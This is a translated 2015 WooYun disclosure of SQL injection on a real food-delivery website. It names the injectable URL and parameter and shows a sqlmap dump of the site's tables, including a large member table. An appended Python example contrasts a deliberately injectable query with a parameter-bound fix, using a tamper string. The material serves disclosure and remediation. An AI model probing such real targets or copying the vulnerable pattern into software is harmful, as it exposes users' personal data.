Vulnerability Summary

Followers: 24

Defect ID: wooyun-2015-0161225

Title: SQL injection in Daojia Meishi (到家美食) (affects a large number of registered member records)

Affected vendor: daojia.com.cn

Author: 路人甲

Submitted: 2015-12-14 15:50

Fix time: 2015-12-19 15:52

Published: 2015-12-19 15:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or assistance contact [email protected]


Vulnerability Details

Disclosure timeline:

2015-12-14: Details reported to the vendor, awaiting the vendor's handling
2015-12-19: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection in Daojia Meishi (到家美食) (affects a large number of registered member records)

Detailed description:

URL where the SQL injection occurs:
http://www.daojia.com.cn/review.php?a=83&r=2003
Result produced by sqlmap:

[Screenshot: 111.png]

Listing the available databases:

[Screenshot: 222.png]

Large number of registered member records:

[Screenshot: 333.png]


Database: daojia
+-----------------------------------------+---------+
| Table | Entries |
+-----------------------------------------+---------+
| Tbl_ActionDetails | 2814984 |
| Tbl_Access | 996189 |
| Tbl_BeiJingAreaRestaurantStat | 735864 |
| Tbl_201312HistoryCartItem | 664350 |
| Tbl_201401HistoryCartItem | 623759 |
| Tbl_BeiJingFood | 619530 |
| Tbl_BeiJingFoodLimit | 619493 |
| Tbl_201311HistoryCartItem | 586665 |
| Tbl_201308HistoryCartItem | 583411 |
| Tbl_201310HistoryCartItem | 527980 |
| Tbl_201307HistoryCartItem | 527561 |
| Tbl_201309HistoryCartItem | 512728 |
| Tbl_Action | 503186 |
| Tbl_201402HistoryCartItem | 478844 |
| Tbl_VisitorStat | 436668 |
| Tbl_201306HistoryCartItem | 409224 |
| Tbl_201305HistoryCartItem | 359163 |
| Tbl_201301HistoryCartItem | 350780 |
| Tbl_201304HistoryCartItem | 333715 |
| Tbl_201303HistoryCartItem | 322358 |
| Tbl_Session | 316389 |
| Tbl_201212HistoryCartItem | 313205 |
| Tbl_Visitor | 298540 |
| Tbl_FoodPhoto | 264860 |
| Tbl_201211HistoryCartItem | 247421 |
| Tbl_201208HistoryCartItem | 237793 |
| Tbl_201207HistoryCartItem | 226471 |
| Tbl_201209HistoryCartItem | 221157 |
| Tbl_201210HistoryCartItem | 216616 |
| Tbl_201403HistoryCartItem | 208613 |
| Tbl_ShangHaiFood | 199828 |
| Tbl_ShangHaiFoodLimit | 199406 |
| Tbl_201302HistoryCartItem | 185388 |
| Tbl_201206HistoryCartItem | 167795 |
| Tbl_ShangHaiAreaRestaurantStat | 157370 |
| Tbl_201312HistoryCart | 151586 |
| Tbl_201205HistoryCartItem | 147893 |
| Tbl_201203HistoryCartItem | 143461 |
| Tbl_201401HistoryCart | 141012 |
| Tbl_201204HistoryCartItem | 138097 |
| Tbl_201311HistoryCart | 138009 |
| Tbl_201308HistoryCart | 133644 |
| Tbl_201112HistoryCartItem | 131951 |
| Tbl_201202HistoryCartItem | 125725 |
| Tbl_201310HistoryCart | 123501 |
| Tbl_201307HistoryCart | 120505 |
| Tbl_201309HistoryCart | 119112 |
| Tbl_BeiJingUsedAddress | 115914 |
| Tbl_201402HistoryCart | 106701 |
| Tbl_Member | 105911 |
| Tbl_SM | 104785 |
| Tbl_201111HistoryCartItem | 100381 |
| Tbl_201201HistoryCartItem | 96176 |
| Tbl_201306HistoryCart | 92479 |
| Tbl_201110HistoryCartItem | 90995 |
| Tbl_201109HistoryCartItem | 88290 |
| Tbl_201108HistoryCartItem | 82310 |
| Tbl_201305HistoryCart | 81121 |
| Tbl_201301HistoryCart | 77091 |
| Tbl_201304HistoryCart | 74801 |
| Tbl_201303HistoryCart | 70882 |
| Tbl_201212HistoryCart | 68421 |
| Tbl_201107HistoryCartItem | 62820 |
| Tbl_ActionStat | 55148 |
| Tbl_201211HistoryCart | 54797 |
| Tbl_201208HistoryCart | 51369 |
| Tbl_201106HistoryCartItem | 50735 |
| Tbl_BeiJingAreaStat | 50112 |
| Tbl_201207HistoryCart | 48427 |
| Tbl_201105HistoryCartItem | 48311 |
| Tbl_201209HistoryCart | 47955 |
| Tbl_201210HistoryCart | 47421 |
| Tbl_201403HistoryCart | 46956 |
| Tbl_AppAdStartRecord | 43792 |
| Tbl_201302HistoryCart | 40439 |
| Tbl_BeiJingFoodCatagory | 38593 |
| Tbl_201104HistoryCartItem | 38133 |
| Tbl_UnknownAddress | 36786 |
| Tbl_201206HistoryCart | 35827 |
| Tbl_201205HistoryCart | 31465 |
| Tbl_201203HistoryCart | 30916 |
| Tbl_201103HistoryCartItem | 30254 |
| Tbl_201204HistoryCart | 29305 |
| Tbl_201112HistoryCart | 28831 |
| Tbl_Topology | 27690 |
| Tbl_201202HistoryCart | 26940 |
| Tbl_BeiJingPresentOrderItem | 26530 |
| Tbl_BeiJingPresentOrder | 26528 |
| Tbl_201101HistoryCartItem | 23501 |
| Tbl_201111HistoryCart | 22396 |
| Tbl_BeiJingRestaurantServiceTime | 21262 |
| Tbl_Pinyin | 20889 |
| Tbl_201201HistoryCart | 20565 |
| Tbl_201110HistoryCart | 20410 |
| Tbl_BeiJingHotFood | 20225 |
| Tbl_201109HistoryCart | 19878 |
| Tbl_201108HistoryCart | 19803 |
| Tbl_KeywordStat | 18153 |
| Tbl_ShangHaiIndexPhrase | 18117 |
| Tbl_201107HistoryCart | 16937 |
| Tbl_ShangHaiUsedAddress | 16339 |
| Tbl_HangZhouFood | 15833 |
| Tbl_HangZhouFoodLimit | 15833 |
| Tbl_ShangHaiFoodCatagory | 15588 |
| Tbl_ShangHaiAreaStat | 15484 |
| Tbl_201102HistoryCartItem | 14968 |
| Tbl_201012HistoryCartItem | 14536 |
| Tbl_BeiJingRestaurantAppraisalHistory | 13046 |
| Tbl_201106HistoryCart | 12632 |
| Tbl_201105HistoryCart | 10789 |
| Tbl_BeiJingIndexPhrase | 10366 |
| Tbl_ShangHaiRestaurantServiceTime | 10038 |

Proof of vulnerability:

See the detailed description above.

Remediation:

Filter (validate and escape) the injected parameter a before it reaches the query.

Copyright notice: when reposting, credit 路人甲@乌云


Vendor Response

Vendor response:

Severity: No impact (vendor ignored)

Ignored at: 2015-12-19 15:52

Vendor reply: (none)

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None
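The remediation above is stated in one line; the following added example (not code from the report or from daojia.com.cn, whose review.php source is not shown) illustrates what "filtering parameter a" means in practice. It assumes a hypothetical review table keyed by a restaurant id (the real meaning of a and r is not stated in the report) and uses an in-memory SQLite database with constructed rows in place of the site's real backend. The vulnerable function concatenates the raw parameter into the SQL text; the hardened function applies a strict integer whitelist and binds the value as a query parameter, which is the layered fix a reviewer would ask for.

```python
import re
import sqlite3

# Constructed sample rows standing in for a restaurant-review table.
# The real schema behind review.php is not known from the report.
SAMPLE_REVIEWS = [
    (1, 83, "great noodles"),
    (2, 83, "slow delivery"),
    (3, 84, "too salty"),
    (4, 91, "would order again"),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE review (id INTEGER PRIMARY KEY, restaurant_id INTEGER, body TEXT)"
    )
    conn.executemany("INSERT INTO review VALUES (?, ?, ?)", SAMPLE_REVIEWS)
    conn.commit()
    return conn


def reviews_vulnerable(conn, a):
    """Anti-pattern: the request parameter is pasted into the SQL text, so any
    SQL grammar the client sends becomes part of the query (the bug class
    the report describes for parameter a)."""
    sql = "SELECT id, restaurant_id, body FROM review WHERE restaurant_id = " + a
    return conn.execute(sql).fetchall()


# Whitelist: an id is a short run of digits and nothing else.
_INT_RE = re.compile(r"[0-9]{1,9}")


def reviews_hardened(conn, a):
    """Fix in two layers: reject anything that is not a plain integer, then
    bind the value as a parameter so it can never change the query structure."""
    if not _INT_RE.fullmatch(a):
        raise ValueError("parameter a must be a positive integer")
    sql = "SELECT id, restaurant_id, body FROM review WHERE restaurant_id = ?"
    return conn.execute(sql, (int(a),)).fetchall()


def demo():
    """Run both versions against a normal value and a constructed tampered value
    and report the row counts / acceptance so the difference is visible."""
    conn = make_db()
    normal = "83"
    tampered = "83 OR 1=1"  # constructed tamper value: appends a boolean condition
    try:
        reviews_hardened(conn, tampered)
        hardened_tampered = "accepted"
    except ValueError:
        hardened_tampered = "rejected"
    return {
        "vuln_rows_normal": len(reviews_vulnerable(conn, normal)),
        "vuln_rows_tampered": len(reviews_vulnerable(conn, tampered)),
        "hardened_rows_normal": len(reviews_hardened(conn, normal)),
        "hardened_tampered": hardened_tampered,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With the concatenating version the tampered value widens the WHERE clause and returns every row in the table, which is exactly how a single unfiltered parameter exposes unrelated tables such as the member table listed above. The hardened version rejects it before any SQL runs; even if the whitelist were omitted, the bound parameter would be compared as a literal value rather than interpreted as SQL, so parameter binding is the part of the fix that must not be skipped.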